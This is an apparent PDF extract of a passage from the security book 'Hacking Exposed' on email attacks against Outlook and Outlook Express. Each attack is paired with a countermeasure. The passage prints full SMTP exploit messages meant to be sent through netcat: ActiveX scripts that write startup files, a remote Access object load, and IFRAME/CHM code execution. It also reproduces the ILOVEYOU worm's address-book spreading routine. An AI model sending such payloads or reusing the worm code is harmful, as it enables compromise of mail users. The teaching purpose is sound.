network security secrets and solutions scambray mcclure phần 10 pdf
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.15 MB, 78 trang )
628
Hacking Exposed: Network Security Secrets and Solutions
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Read this!
Importance: high
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="_boundary1_"
_boundary1_
Content-Type: multipart/alternative;
boundary="_boundary2_"
_boundary2_
Content-Type: text/html; charset=us-ascii
<HTML>
<h2>Hello World!</h2>
</HTML>
_boundary2_
_boundary1_
Content-Type: application/octet-stream; name="plant.txt"
Content-ID: <5551212>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="plant.txt"
Content-MD5: Psn+mcJEv0fPwoEc4OXYTA==
SSBjb3VsZGEgaGFja2VkIHlhIGJhZCANCg==
_boundary1_
.
quit
Piping this through netcat to an open SMTP server will deliver an HTML-formatted
message, with the file plant.txt attached, to For a better understand
-
ing of MIME boundaries in multipart messages, see RFC 2046 Section 5.1.1 at
It might also be informative to examine a test mes
-
sage sent to Outlook Express. Click Properties | Details | Message Source to view the
raw data (Outlook won’t let you see all the raw SMTP data).
Chapter 16: Hacking the Internet User
629
We’ll refer to this method throughout this chapter as a “mail hacking capsule.” Let’s
apply this general technique to some specific attacks found in the wild to demonstrate the
risk level “mailicious” email actually represents.
U
Generic Mail Hacking Countermeasures
Obviously, rendering of HTML mail should be disabled within mail client software. Un
-
fortunately, this is difficult or impossible with most modern email clients. Additional
web “features” that should definitely be disabled in email are mobile code technologies.
We’ve already discussed how to do this in the section on security zones earlier, but we’ll
reiterate it here so the message sinks in. For both Microsoft Outlook and Outlook Express,
set Zone under Secure Content to Restricted Sites under Tools | Options | Security, as
shown in Figure 16-2 (recall that these settings will not apply to web browsing with IE,
which uses its own settings). This single setting takes care of most of the problems identi
-
fied next. It is highly recommended.
And, of course, safe handling of mail attachments is critical. Most people’s first in
-
stinct is to blame the vendor for problems like the ILOVEYOU virus (see next), but the re
-
ality is that almost all mail-borne malware requires some compliance on the part of
the user. The Outlook patch available at />downloadDetails/Out2ksec.htm makes it even harder for users to automatically launch
attachments, forcing them to click through at least two dialog boxes before executing an
attachment (coincidentally, it also sets the security zone to Restricted Sites). It isn’t fool-
proof, as we will see next, but it raises the bar significantly for would-be attackers. Raise
the bar all the way by using good judgment: don’t open messages or download attach-
ments from people you don’t know!
Executing Arbitrary Code Through Email
The following attacks demonstrate many different mechanisms for executing commands
on the victim’s machine. Many of these are activated simply by opening the malicious
message or previewing it in Outlook/OE’s preview pane.
]
”Safe for Scripting” Mail Attacks
Popularity: 5
Simplicity: 6
Impact: 10
Risk Rating: 7
Attacks don’t get much more deadly than this: all the victim has to do is read the mes
-
sage (or view it in the preview pane if Outlook/OE is configured to do so). No intervention
by the user is required. This wonderful nastiness is brought to you again by the
Scriptlet.typelib ActiveX control that is marked “safe for scripting,” as discussed in the
previous section on ActiveX. Eyedog.ocx could just as easily be used, but this specific ex
-
ploit is based on Georgi Guninski’s proof-of-concept code using Scriptlet.typelib at
Here is a slightly modified version of his
code pasted into a mail hacking capsule:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Ya gotta read this!
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
If you have received this message in error, please delete it.
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\WIN98\\start menu\\programs\\startup\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-
00C04FD58A0B'></object><SCRIPT>alert(' Written by Georgi Guninski
/>scr.write();
</SCRIPT>
</object>
.
quit
This code performs a two-step attack. First, it creates an HTML Application file (exten
-
sion .HTA) in the user’s Startup folder and writes the payload of the script to it. The cre
-
ation of the file occurs silently and almost invisibly to users as soon as they preview the
message (they might catch the disk-drive-activity light fluttering if they’re watching ex
-
tremely closely). Here’s what our test message looks like in the user’s inbox (Outlook Ex
-
press is depicted here). This is all that has to happen for the attack to be completed:
viewing the message in the preview pane.
630
Hacking Exposed: Network Security Secrets and Solutions
The second step comes when the user inevitably reboots the machine (the script could
reboot the user’s computer also, of course). The .HTA file is executed at startup (.HTA files
are automatically interpreted by the Windows shell). In our example, the user is greeted by
the following pop-up message:
This is quite a harmless action to have performed, out of an almost limitless range of possi
-
bilities. The victim is completely at the mercy of the attacker here.
The so-called KAK worm is based on exploitation of the Scriptlet vulnerability and may
also be used to prey upon unwary (and unpatched) Outlook/OE users. For more information
on KAK, see />Chapter 16: Hacking the Internet User
631
U
”Safe for Scripting” Countermeasures
Obtain the patch for the Scriptlet/Eyedog ActiveX components, available at http://
www.microsoft.com/technet/security/bulletin/ms99-032.asp.
It is important to note, once again, that this only corrects the problem with Scriptlet
and Eyedog. For true security, disable ActiveX for mail readers as discussed earlier in the
section on security zones.
]
Executing MS Office Documents Using ActiveX
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
Georgi Guninski didn’t stop when he exploited ActiveX tags embedded within HTML
email messages to load potentially dangerous ActiveX controls. Subsequent advisories
posted to his site noted that potentially dangerous Microsoft Office documents could also
be launched using the same technique (Office docs behave much like ActiveX controls
themselves). These findings are covered at sheetex-desc.html
(for Excel and PowerPoint documents) and />(covering launching of Visual Basic for Applications (VBA) code within Access databases).
We’ll discuss the second of these findings here for two reasons. One, the Ex-
cel/PowerPoint issue is actually more interesting for its ability to write files surreptitiously
to disk, which we discuss in an upcoming section. Secondly, the Access-based vulnerability
is more severe in the opinion of many in the security community because it circumvents any
security mechanisms applied to ActiveX by the user—that’s right, even if ActiveX is completely
disabled, you are still vulnerable. The severity of this problem was judged to be so great by
the SANS Institute that they termed it “probably the most dangerous programming error
in Windows workstation (all varieties—95, 98, 2000, NT 4.0) that Microsoft has made” (see
The sad part is, this seeming
sensationalism may be on target.
The problem lies in the checks that Windows performs when an Access file (.MDB) is
loaded within IE from an object tag, as shown in the snippet of HTML proposed by
Georgi Guninski, next:
<OBJECT data="db3.mdb" id="d1"></OBJECT>
As soon as IE encounters the object tag, it downloads the Access database specified in
the “data=“ parameter, then calls Access to open it. It does this before warning the user
about the potential for any damage caused by running the database. Thus, the database
launches whether IE/Outlook/OE has been configured to execute ActiveX controls or
not. Ugh.
632
Hacking Exposed: Network Security Secrets and Solutions
Georgi’s exploit relies on a remote file hosted by his web site called db3.mdb. It is an
Access database containing a single form that launches Wordpad. Here is another mail
hacking capsule demonstrating how this attack would be carried out in practice:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: And another thing!
Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
<HTML>
<h2>Enticing message here!</h2>
<OBJECT data=" id="d1"></OBJECT>
</HTML>
.
quit
We have provided an explicit URL reference in this example to Georgi’s db3.mdb file
so that it will work via email (line 12). SANS claimed to have used an SMB share over the
Internet to get the Access file. The mind boggles—how many FTP servers do you know
about that permit unsupervised puts and gets? We discuss other repositories that could
be used by attackers next.
The key point here is that by rendering this simple tag, IE/Outlook/OE downloads
and launches a file containing a powerful VBA macro without any user input. Is anyone
not scared by this?
U
Countermeasure: Define an Access Admin Password
Disabling ActiveX will not stop this Access exploit, so it must be patched according to the in
-
structions found at />We draw particular attention to the patch specifically for the Access-related issue (Microsoft
calls it the “IE Script” vulnerability), which can be found at />windows/ie/download/critical/patch11.htm.
Microsoft recommended a work-around that is also good to apply whether the patch is
applied or not. The work-around is to set an Admin password for Access (by default it is
blank), as follows:
1. Start Access 2000 but don’t open any databases.
2. Choose Tools | Security.
3. Select User And Group Accounts.
Chapter 16: Hacking the Internet User
633
634
Hacking Exposed: Network Security Secrets and Solutions
4. Select the Admin user, which should be defined by default.
5. Go to the Change Logon Password tab.
6. The Admin password should be blank if it has never been changed.
7. Assign a password to the Admin user.
8. Click OK to exit the menu.
This should prevent rogue VBA code from running with full privileges. SANS also
notes that blocking outgoing Windows file sharing at the firewall (TCP 139 and TCP 445)
will reduce the possibility of users being tricked into launching remote code.
]
Executing Files Using a Nonzero ActiveX CLSID Parameter
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
The basis of this vulnerability was an almost offhand remark in a Bugtraq thread
( concerning the malware.com “force
feeding” vulnerability (see next). Weld Pond, hacker extraordinaire of the L0pht and
netcat NT fame (Chapter 5), chimed in on behalf of his colleague DilDog, of Cult of the
Dead Cow and Back Orifice 2000 fame (Chapters 4 and 14), to provide a mechanism for
executing files force-fed to users via the malware.com technique. By configuring an
ActiveX OBJECT tag with a nonzero CLSID parameter into the body of a malicious email
message, any file on disk can be executed. This frightening proposal makes any execut-
able on the user’s disk a potential target. Here’s a sample mail hacking capsule:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Read this!
Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
<HTML>
<HEAD>
</HEAD>
<BODY>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='c:\windows\calc.exe'></OBJECT>
</BODY></HTML>
.
quit
Chapter 16: Hacking the Internet User
635
Note the nonzero CLSID parameter. This is what makes the exploit tick. The file to be
executed is simply listed in the CODEBASE parameter.
However, in our testing we noted that several planets had to be in alignment for this
to work. Primarily, on Outlook Express 5.00.2615.200, we had to set the security zone to
Low, and we were still prompted with a dialog box to execute an unsigned control when
we tried to launch calc.exe in the System folder. Users would have to be pretty clueless to
fall for this one, but it’s an intriguing start, especially when taken together with the capa
-
bility to write files to disk as supplied by malware.com.
U
Nonzero CODEBASE Countermeasure
Based on our testing, setting security zones to an appropriate level takes care of this prob
-
lem (see the discussion of security zones earlier).
]
Outlook/OE Date Field Buffer Overflow
Popularity: 7
Simplicity: 9
Impact: 10
Risk Rating: 10
Does it seem that ActiveX lies at the heart of most of these exploits? In a July 18, 2000,
post to Bugtraq ( a different sort of
Outlook/OE vulnerability was announced that didn’t have anything to do with ActiveX.
This problem was a classic buffer overflow issue caused by stuffing the GMT section
of the date field in the header of an email with an unexpectedly large amount of data.
When such a message is downloaded via POP3 or IMAP4, the INCETCOMM.DLL file re-
sponsible for parsing the GMT token does not perform proper bounds checking, causing
Outlook/OE to crash and making arbitrary code execution possible. Sample exploit code
based on that posted to Bugtraq is shown next:
Date: Tue, 18 July 2000 14:16:06 +<
approx. 1000 bytes
><
assembly code to execute
>
As we have explained many times in this book, once the execution of arbitrary com
-
mands is achieved, the game is over. A “mailicious” message could silently install Tro
-
jans, spread worms, compromise the target system, launch an attachment—practically
anything.
OE users would merely have to open a folder containing a malicious email in order to
become vulnerable, and typically the act of simply downloading such a message while
checking mail would cause the crash/overflow. OE users are then kind of stuck—the
message never successfully downloads, and the exploit will crash the program on every
subsequent attempt to retrieve mail. One work-around is to use a non-Outlook/OE mail
client to retrieve the mail and delete it (assuming you can tell which messages are the
right ones…). Netscape Messenger does a handy job of this, displaying the date field in
the preview pane to indicate which are the offending messages. Outlook users are vulner
-
able if they preview, read, reply, or forward an offending message.
Initially, exploit code was posted to Bugtraq, until it was later revealed that this exam
-
ple was hard-coded to work against a server on a private LAN, and thus would not func
-
tion when mailed to Internet-connected users. It seems the post was made mistakenly by
Aaron Drew, who apparently was attempting to use a technique similar to the mail hack
-
ing capsule we’ve outlined in this chapter when he inadvertently sent a message to
Bugtraq instead. For the record, such a message would look something like this (note the
Date line—the overflow has been omitted for brevity, enclosed here by square brackets
that are not necessary in the actual exploit):
helo somedomain.com
mail from: <>
rcpt to: <>
data
Date: Sun, 7 May 2000 11:20:46 +
[~1000bytes + exploit code in hex or ascii]
Subject: Date overflow!
Importance: high
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
This is a test of the Outlook/OE date field overflow.
.
quit
Underground Security Systems Research (USSR, ) also
claimed credit for discovering this flaw (or at least hearing about it from a hacker named
Metatron), but said they waited until Microsoft had prepared a patch before going public.
USSR posted their exploit, which opened up a connection to their web site. It can be exe-
cuted in almost exactly the same way as shown earlier.
U
Countermeasure for Date Field Overflow
According to the bulletin posted by Microsoft at />security/bulletin/MS00-043.asp, the vulnerability can be patched by installing the fix at
/>It can also be eliminated by a default installation of either of the following upgrades:
▼
Internet Explorer 5.01 Service Pack 1
▲
Internet Explorer 5.5 on any system except Windows 2000
A nondefault installation of these upgrades will also eliminate this vulnerability, as
long as an installation method is chosen that installs upgraded Outlook Express compo
-
nents (the user should be prompted about this during the installation process).
When installed on a Windows 2000 machine, IE 5.5 does not install upgraded Outlook Express com
-
ponents and therefore does
not
eliminate the vulnerability.
636
Hacking Exposed: Network Security Secrets and Solutions
Also note that Microsoft stated that Outlook users who have configured Outlook to
use only MAPI services would not be affected, regardless of what version of Internet Ex
-
plorer they have installed. INETCOMM.DLL is not used when Internet E-mail services is
not installed under Tools | Services.
Outlook Address Book Worms
During the last years of the 20
th
century, the world’s malicious code jockeys threw a wild
New Year’s party at the expense of Outlook and Outlook Express users. A whole slew of
worms was released that was based on an elegant technique for self-perpetuation: by
mailing itself to every entry in each victim’s personal address book, the worm masquer
-
aded as originating from a trusted source. This little piece of social engineering (see
Chapter 14) was a true stroke of genius. Corporations that had tens of thousands of users
on Outlook were forced to shut down mail servers to triage the influx of messages zip
-
ping back and forth between users, clogging mailboxes and straining mail server disk
space. Who could resist opening attachments from someone they knew and trusted?
The first such email missile was called Melissa, and though David L. Smith, the al-
leged author of Melissa, was caught and eventually pleaded guilty to a second-degree
charge of computer theft that carried a five- to ten-year prison term and up to a $150,000
fine, people kept spreading one-offs for years. Such household names as Worm.Ex-
plore.Zip, BubbleBoy, and ILOVEYOU made the rounds until the media seemed to get
tired of sensationalizing these exploits late in 2000. The threat still persists, however, and
it is one that needs to be highlighted.
]
The ILOVEYOU Worm
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
Here is the pertinent Visual Basic Script language (VBScript) subroutine from the
ILOVEYOU worm that caused it to spread via email (some lines have been manually bro
-
ken to fit the page):
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
Chapter 16: Hacking the Internet User
637
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software
\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
This simple 37-line routine invokes the Messaging Application Programming Inter
-
face (MAPI) to scour the Windows Address Book (WAB) in the Registry, and creates a
mail item with the subject “ILOVEYOU” and message body “kindly check the attached
LOVELETTER coming from me” for each recipient it finds there. (Thanks to Brian Lewis
of Foundstone Inc. for help with the code analysis.) In case any nonprogrammers out
there think this is rocket science, let us remind you that ILOVEYOU was based on an aca
-
demic thesis paper written by a 23-year-old college student. Who knows how much dam
-
age could have been done?
U
Stopping Address Book Worms
After years of abuse in the media, Microsoft tired of pointing out that users were ultimately
to blame for launching email attachments containing such worms and released a patch.
The patch was called the Outlook 2000 SR-1 E-mail Security Update and the Outlook 98
E-mail Security Update ( see />638
Hacking Exposed: Network Security Secrets and Solutions
Out2ksec.htm and Out98sec.htm, respectively). One feature of this three-pronged fix was
the Object Model Guard, which was designed to prompt users whenever an external pro
-
gram attempted to access their Outlook Address Book or send email on the user’s behalf.
Reliable Software Technologies Corporation (RSTCorp) released an add-on utility that
stops certain calls to Outlook by monitoring the Virtual Basic Scripting Engine, thereby
stopping the spread of viruses like ILOVEYOU. The patch, called JustBeFriends.dll (JBF),
can be used in conjunction with Microsoft’s update for Outlook. In contrast to Microsoft’s
Object Model Guard, which works by controlling access to functions within Outlook that
can be used to gather email addresses or send emails, JBF “works by controlling the ability
of other applications to access Outlook or Outlook Express. In the event that the access
comes from a script being run from the desktop or from an attachment, the access is denied.
Otherwise, the user is asked to confirm that the application should be allowed access to
Outlook” (taken from the Technical Details on JBF at />jbf/tech.html).
RSTCorp claims that their approach is superior, since Microsoft’s Object Model
Guard must protect an exhaustive list of objects if it is to be successful, a challenging task.
They also note that email addresses may still be exposed if they appear in signatures,
message bodies, or other documents, and that “future methods for exploiting flaws in
Outlook to send e-mails are likely to be found.” By gating script-based access to Out-
look/OE, JBF theoretically can prevent new attacks based on a wide range of related at-
tack techniques.
JustBeFriends can be found at We wish it were pack-
aged as separate files instead of a monolithic installer (so much for engendering trust),
but we nevertheless recommend it for Outlook/OE users on NT/2000 platforms.
JustBeFriends does not work on Win 9
x
platforms.
File Attachment Attacks
One of the most convenient features of email is the ability to attach files to messages. This
great timesaver has obvious drawbacks, however—namely, the infallible propensity of
users to execute just about any file they receive via email. No one seems to recall that this
is equivalent to inviting the bad guys right into your living room.
Next we will discuss many attacks that leverage files attached to email messages.
Many revolve around mechanisms for disguising the nature of the attached file or mak
-
ing it irresistibly attractive to the victim’s mouse-clicking finger. Other attacks we discuss
are much more insidious, actually writing attached files to disk without any user inter
-
vention or knowledge. Most Internet users know to handle email attachments extremely
carefully and with great skepticism—we hope the following section reinforces this con
-
cept to the hilt.
Chapter 16: Hacking the Internet User
639
640
Hacking Exposed: Network Security Secrets and Solutions
]
Scrap File Attachment Attacks
Popularity: 5
Simplicity: 5
Impact: 10
Risk Rating: 7
A little-known secret of Windows is that files with the extension .SHS have their real file
extension hidden by default according to the Registry setting HKEY_CLASSES_ROOT\
ShellScrap\NeverShowExt. This probably wouldn’t be that big a deal, except that .SHS
files, also know as scrap files or Shell Scrap Objects, can execute commands. Based on Ob
-
ject Linking and Embedding (OLE) technology discussed in the previous section on
ActiveX, scrap files are essentially a wrapper for another embedded object. Objects can be
Excel spreadsheets (which most people have seen embedded in Word documents) or even
other files. The easiest way to create one is to embed a file into another OLE-compliant ap
-
plication (try Wordpad) and then to copy its icon to another folder. The file is now con-
tained in its very own wrapper file, with its own special icon and a unique extension (SHS).
When the SHS file is launched, the embedded object is also executed. What’s more, com-
mands can be associated with the embedded object using Microsoft’s Object Packager,
opening up the entire realm of malicious activities to anyone halfway familiar with DOS.
In June 2000, someone launched a worm called LifeChanges that leveraged these fea-
tures of scrap files to attack users. The worm was vectored by email with a varying sub-
ject line referring to jokes contained in the attached file. The file attachment was a scrap
file with a fraudulent .TXT extension, making it seem like a common text file (the default
scrap file icon even looks like a text file). Once executed, LifeChanges performed the stan-
dard routines: mailed itself to the first 50 recipients of the victim’s address book, deleted
files, and so on. It was startling to see someone base an attack so clearly on the malicious
features of scrap files that had been known for years, and most entertainingly chronicled
on the PCHelp web site at Who knows
how many other land mines like this one lie in wait in the Windows Registry?
U
Scrap File Countermeasures
Some excellent advice for blunting the most dangerous aspects of scrap files is available
on PCHelp, including the following:
▼
Delete the NeverShowExt Registry value referenced earlier and from under
HKLM \SOFTWARE\Classes\DocShortcut, thus making SHS and SHB
extensions visible in Windows. (SHB files perform similarly to SHS.)
■
Update antivirus scanners to look at SHS and SHB files in addition to other
executable file types.
▲
Disable scrap files entirely by either removing them from the list of known
Windows file types or by deleting the shscrap.dll file in your System folder.
]
Hiding Mail Attachment Extensions by Padding with Spaces
Popularity: 7
Simplicity: 8
Impact: 9
Risk Rating: 8
In a post to the Incidents mailing list (URL) on May 18, 2000, Volker Werth reported a
method for sending mail attachments that cleverly disguised the name of the attached file.
By padding the filename with spaces (%20 in hex), mail readers can be forced to display
only the first few characters of the attachment name in the user interface. For example:
freemp3.doc . . . [150 spaces] . . . .exe
This attachment appears as freemp3.doc in the UI, a perfectly legitimate-looking file that
might be saved to disk or launched right from the email. Here’s a screen shot of what this
looks like in Outlook Express:
U
Hidden File Attachment Countermeasure
As you can see by the icon in the preceding illustration, the file attachment is plainly not a
Word document. The telltale trailing ellipsis (…) also helps to give this away. If these
Chapter 16: Hacking the Internet User
641
signs aren’t enough, you shouldn’t be opening attachments directly from email messages
anyway! The Outlook SR-1 Security patch can help with this—it forces you to save most
harmful file attachment types to disk (see />downloadDetails/Out2ksec.htm).
]
Social Techniques for Cajoling Attachment Download
Popularity: 10
Simplicity: 10
Impact: 10
Risk Rating: 10
The direct approach to writing a mail attachment to disk is social engineering. Ever
see this text appear in the body of an email?
“This message uses a character set that is not supported by the Internet Service. To
view the original message content, open the attached message. If the text doesn’t
display correctly, save the attachment to disk, and then open it using a viewer that
can display the original character set.”
This is a standard message created when mail messages (in .EML format) are for-
warded to Outlook users and some error occurs with the MIME handling of the en-
closed/forwarded message. It strikes us that this is an almost irresistible technique for
getting someone to launch an attachment (either directly or after saving to disk). We’ve
actually received such messages sent from the listservers of very prominent security
mailing lists! Of course, this is one of an unlimited range of possibilities that attackers
could insert into the body or subject field of a message. Don’t be fooled!
U
File Attachment Trickery Countermeasure
Your mouse-clicking finger is the only enemy here—teach it to behave and scan down
-
loaded attachments with virus-scanning software before launching it. Even then, take a
serious look at the sender of the email before making the decision to launch, and be aware
that mail worms like ILOVEYOU can masquerade as your most trusted friends.
Writing Attachments to Disk Without User Intervention
To this point, we’ve talked about several mechanisms for executing files that might lie on a
remote user’s disk, and the attacks listed so far have generally relied on existing executables
to perform their dirty work (either on the remote server or on a local user’s disk). However,
what if an attacker also had the ability to write files to the victim’s disk? This would provide
a complete methodology for delivering a payload and then detonating it.
642
Hacking Exposed: Network Security Secrets and Solutions
Chapter 16: Hacking the Internet User
643
]
Hijacking Excel/PowerPoint’s SaveAs Function
Popularity: 5
Simplicity: 5
Impact: 8
Risk Rating: 6
The magic behind this attack comes from Georgi Guninski’s observation that
MS Excel and PowerPoint have a SaveAs function (see />sheetex-desc.html). Thus, once an Office document is called within IE using the object tag
(as we have seen before), it exposes the ability to save data to any arbitrary location on
disk. Georgi’s exploit extracts the data to be saved directly from a file called Book1.xla,
which is a simple Excel file renamed to xla. Georgi uses the xla extension so that the file is
executed by Windows at boot time if placed in the Startup folder.
A slightly modified version of Georgi’s complete exploit encapsulated in our mail
hacking format is shown next:
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: Check this out!
Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
<HTML>
<h2>Enticing message here!</h2>
<object data=" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn=" D:\\test\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
alert(fn+" successfully written");
}
setTimeout("f()",5000);
</SCRIPT>
</HTML>
.
quit
Georgi’s code is contained between the <object> and </SCRIPT> tags. We have modified
it to access his Book1.xla file using its full URL (his original exploit had the file available
directly on the web server). The content of Book1.xla is written to the file specified in the
“fn=“ line. We also removed some commented lines from Georgi’s original code that
showed how you could save the file to the Windows Startup folder (we think you get the
point). Previewing this message in OE on NT4 with the security zone set at Low first pops
up a brief file transfer window, then the following message:
We’re lazy and used Georgi’s pre-built Book1.xla file as raw material here. It is harm
-
less (containing only a couple lines of code that execute “Hello world” in a DOS shell win
-
dow). However, with the growth of free and anonymous file repository services on the
Internet, it would be simple for malicious attackers to create their own malicious Office
document and make it available for download. Misconfigured or compromised web or
FTP servers would also make for a ripe depot for such files.
U
Countermeasure for Excel/PowerPoint File Writing Attacks
Need we say it again? Obtain the relevant patches from />technet/security/bulletin/MS00-049.asp. This patch marks Excel and PowerPoint docs as
“unsafe for scripting” (no snickering, please). Of course, you could stop putting Band-Aids
all over your computer and staunch the bleeding entirely by disabling ActiveX in the ap-
propriate manner, as described in the discussion on security zones earlier.
]
Force Feeding Attachments
Popularity: 5
Simplicity: 2
Impact: 8
Risk Rating: 5
The people at suggested the phrase “force feeding” to de
-
scribe the mechanism they proposed for downloading a file to a user’s disk without his or
her permission. The essence of malware.com’s exploit is their claim that Outlook/OE ig
-
nores user input when asked to dispatch a file attachment to an email message. Normally,
644
Hacking Exposed: Network Security Secrets and Solutions
when an email attachment is launched from within the mail reader, Outlook/OE
prompts the user to either Open, Save To Disk, or Cancel the action. Malware.com
claimed that no matter what the user selected, the attachment was written to the Win
-
dows %temp% directory (C:\Windows\temp on Win 9x and C:\temp on NT). Win
2000’s temp folders are per-user and are harder to pin down with regularity if it is cleanly
installed and not upgraded. Once deposited, the file was launched using a clever trick:
the HTTP meta-refresh tag, which is used to redirect the browser silently and automati
-
cally to a page contained within the tag. For example:
<META HTTP-EQUIV="refresh" content="2;URL=">
This code embedded in a web page will bounce viewers to www.othersite.com. The “con
-
tent=“ syntax tells the browser how long to wait before redirecting. Malware.com simply
pointed the meta-refresh at one of the local files it deposited via force-feeding:
<meta http-equiv="refresh" content="5;
url=mhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">
The lunar.mhtml file, force-fed as an attachment to the original message, contained a link
to a “safe for scripting” ActiveX control that launched a second attachment, an executable
called mars.exe. Roundabout, but effective.
In the Bugtraq ( thread covering
this finding, at least two quite reputable security authorities disagreed on whether this
phenomenon actually worked as advertised. Testing by the authors of this book pro-
duced erratic results, but supported the idea that the appropriate IE security zone (see
earlier) used for mail reading in Outlook/OE had to be set to Low for this to occur, and it
only occurred sporadically at that. We were successful at forcing an attachment to the
temp directory on Win 98 SE and NT4 Workstation systems with zone security at Low on
two occasions, but could not repeat this consistently. The mystery of force feeding à la
malware.com remains unsolved.
This is a bit comforting. Think of the trouble this could cause in conjunction with
Georgi Guninski’s exploit for executing code within MS Office documents: attackers
could send the Office document containing malicious code as an attachment, and then
send a second message with the appropriate ActiveX tag embedded within the body of
the message that pointed to the %temp% folder where the attachment gets force-fed, like
it or not (Georgi actually pulls this off—within the same message. See the next attack).
Of course, as we’ve mentioned, the easy availability of free and anonymous file repos
-
itory services on the Internet makes the downloading of code to local disk unnecessary.
By pointing malicious email messages at exploit code available on one of these services,
an attacker guarantees the availability of the second part of such an attack, and it is a vir
-
tually untraceable perch at that.
Chapter 16: Hacking the Internet User
645
]
Using IFRAME to Write Attachments to TEMP
Popularity: 5
Simplicity: 9
Impact: 10
Risk Rating: 8
Georgi demonstrates his keen eye for seemingly small problems with broad implica
-
tions in this, his #9 advisory of 2000 (see The
key issue here is Outlook/OE’s propensity to create files in the TEMP directory with a
known name and arbitrary content, much like the mechanism proposed by
malware.com. However, by leveraging other exploits he has developed, including the
Windows Help File shortcut execution vulnerability (.CHM files, see http://
www.nat.bg/~joro/chm-desc.html) and the ever-useful IFRAME tag (see earlier),
Georgi seems to have uncovered a consistent mechanism for delivering the goods—and a
way to execute the downloaded code. Thus, we have given this exploit a Risk Rating of 8,
among the highest of the ones we’ve discussed so far, because it comes the closest to be-
ing the total package: write a file to disk, then execute it without any user input.
The trick is the use of the IFRAME tag within the body of an email message that refer-
ences an attachment to the same message. For some peculiar reason that perhaps only
Georgi knows, when the IFRAME “touches” the attached file, it is flushed to disk. It is
then easy to call the file from a script embedded in the body of the very same message.
The file Georgi writes is a CHM file, which he has graciously configured to call
Wordpad.exe using an embedded “shortcut” command.
Here is a mail hacking capsule demonstrating the attack. Note that the CHM file has
to be prepacked using mpack (see the earlier section “Mail Hacking 101”).
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: This one takes the cake!
Importance: high
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="_boundary1_"
_boundary1_
Content-Type: multipart/alternative;
boundary="_boundary2_"
_boundary2_
Content-Type: text/html; charset=us-ascii
<IFRAME align=3Dbaseline alt=3D"" =
646
Hacking Exposed: Network Security Secrets and Solutions
border=3D0 hspace=3D0=20
src=3D"cid:5551212"></IFRAME>
<SCRIPT>
setTimeout('window.showHelp("c:/windows/temp/abcde.chm");',1000);
setTimeout('window.showHelp("c:/temp/abcde.chm");',1000);
setTimeout('window.showHelp("C:/docume~1/admini~1/locals~1/temp/abcde.chm");
',1000);
</SCRIPT>
_boundary2_
_boundary1_
Content-Type: application/binary;
name="abcde.chm"
Content-ID: <5551212>
Content-Transfer-Encoding: base64
[Base64-encode abcde.chm using mpack and embed here]
_boundary1_
.
quit
In the authors’ testing of this attack against Windows 9x, NT, and 2000, Outlook, and
Outlook Express, this exploit was triggered flawlessly, most often when simply pre-
viewed (the lines beginning with “setTimeout” actually specify the outcome on the three
different OSes—can you tell which is for which?).
The key item in this code listing is the Content-ID field, populated with the nonce
5551212 in our example. The src of the IFRAME in the body of the email refers to the ID of
the MIME attachment of the same message, creating a nice circular reference that allows
the attachment to be written to disk and called by the same malicious email message.
U
Countermeasure to IFRAME Attachment Stuffing
The only defense against this one is conscientious use of ActiveX, as explained in the sec
-
tion on security zones earlier. Microsoft has not released a patch.
IRC HACKING
Internet Relay Chat (IRC) remains one of the more popular applications on the Internet,
driven not only by the instant gratification of real-time communications, but also by the
ability to instantaneously exchange files using most modern IRC client software (our fa
-
vorite is mIRC; see Chapter 14). This is where the trouble starts.
IRC newbies are often confused by the frequent offers of files from participants in a
channel. Many are sensible enough to decline offers from complete strangers, but the
very nature of IRC tends to melt this formality quickly. One of the authors’ relatives was
suckered by just such a ploy, a simple batch file that formatted his hard drive (his name
